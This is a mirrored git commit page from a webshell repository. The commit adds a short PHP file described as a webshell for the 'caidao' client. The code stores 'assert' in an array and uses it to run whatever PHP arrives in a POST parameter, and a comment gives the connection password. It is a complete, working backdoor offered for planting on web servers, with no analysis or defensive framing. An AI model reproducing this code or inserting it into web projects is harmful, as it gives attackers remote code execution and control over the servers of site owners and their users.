1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00

add php webshell for caidao

This commit is contained in:
tennc
2014-10-20 08:27:05 +08:00
parent 5fc033c147
commit c80515aa38

View File

@@ -0,0 +1,5 @@
<?php
$item['tt'] = 'assert';
$array[] = $item;
$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234
?>